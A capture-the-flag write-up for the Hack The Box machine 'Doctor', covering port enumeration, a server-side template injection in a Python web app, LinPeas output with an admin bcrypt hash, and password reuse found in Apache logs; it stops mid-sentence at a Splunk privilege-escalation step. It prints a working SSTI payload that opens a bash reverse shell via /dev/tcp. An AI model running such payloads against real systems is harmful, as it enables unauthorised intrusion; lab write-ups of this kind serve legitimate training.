HTB Doctor

Writeup for Doctor box on

Initial enumeration

Found port 22 80 and 8089 open on the box.

While browsing the IP we discover a hostname doctors.htb, after setting this host and accessing the page we find a new portal:

After registering an account we discover we can post messages. Inspecting the sourcode of the page we also find a /archive page which seems to be under development however if we post a new message, the title of the message appears in the xml feed.

Since this is python application it's worth checking for SSTI - Server side template injection

The first payload we can try is a simple {{ 4 * 4 }} which will output as 16 in the title if the exploit work. This works as expected and we can proceed to a more complex payload:

title={{"/var/tmp/cccc2.cfg", "w").write("from subprocess import check_output\n\nRUNCMD = check_output\n") }}{{ config.from_pyfile("/var/tmp/cccc2.cfg") }}{{ config["RUNCMD"]("/bin/bash -c '/bin/bash -i >%26 /dev/tcp/ 0>%261'",shell=True) }}&content=a&submit=Post

User enumeration

We are the user web

web@doctor:~$ id
uid=1001(web) gid=1001(web) groups=1001(web),4(adm)

Running LinPeas

 --> Found interesting column names in user (output limit 10)                                                                                             
        id INTEGER NOT NULL, 
        username VARCHAR(20) NOT NULL, 
        email VARCHAR(120) NOT NULL, 
        image_file VARCHAR(20) NOT NULL, 
        password VARCHAR(60) NOT NULL, 
        PRIMARY KEY (id), 
        UNIQUE (username), 
        UNIQUE (email)
1, admin, [email protected], default.gif, $2b$12$Tg2b8u/elwAyfQOvqvxJgOTcsbnkFANIDdv6jVXmxiWsg4IznjI0S

In var/log/apache2 there is a backup file where we can see something strange:

The string from the backup works for sudo as shaun

Privilege escalation

Splunkd app command execution exploit

Using the exploit from